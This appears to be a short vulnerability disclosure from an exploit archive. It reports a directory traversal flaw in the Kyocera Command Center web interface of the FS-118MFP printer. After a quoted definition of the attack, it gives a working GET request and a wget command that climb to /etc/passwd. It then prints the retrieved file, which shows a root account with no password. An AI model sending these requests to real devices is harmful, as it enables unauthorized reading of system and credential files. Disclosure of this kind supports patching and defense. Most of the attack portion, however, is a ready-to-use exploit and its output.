Kyocera Command Center Directory Traversal Vulnerability Version: I've tested this vulnerability to Kyocera Command Center embedded in FS-118MFP (system Linux embedded) printer but I suppose that other Kyocera printers may be vulnerable Vulnerability: Directory Traversal Risk: Critical Description (Wikipedia -http://en.wikipedia.org/wiki/Directory_traversal-): "A directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks" Example GET Request: GET /../../../../../../../../../etc/passwd HTTP/1.0 Example file download: wget http://yourip/../../../../../../../../../etc/passwd cat passwd root::0:0:root:/root:/bin/sh bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/usr/sbin: sys:*:3:3:sys:/dev: adm:*:4:4:adm:/var/adm: lp:*:5:7:lp:/var/spool/lpd: sync:*:6:8:sync:/bin:/bin/sync shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown halt:*:8:10:halt:/sbin:/sbin/halt mail:*:9:11:mail:/var/spool/mail: news:*:10:12:news:/var/spool/news: uucp:*:11:13:uucp:/var/spool/uucp: operator:*:12:0:operator:/root: games:*:13:100:games:/usr/games: ftp:*:15:14:ftp:/var/ftp: man:*:16:100:man:/var/cache/man: nobody:*:65534:65534:nobody:/home:/bin/sh Francesco Tornieri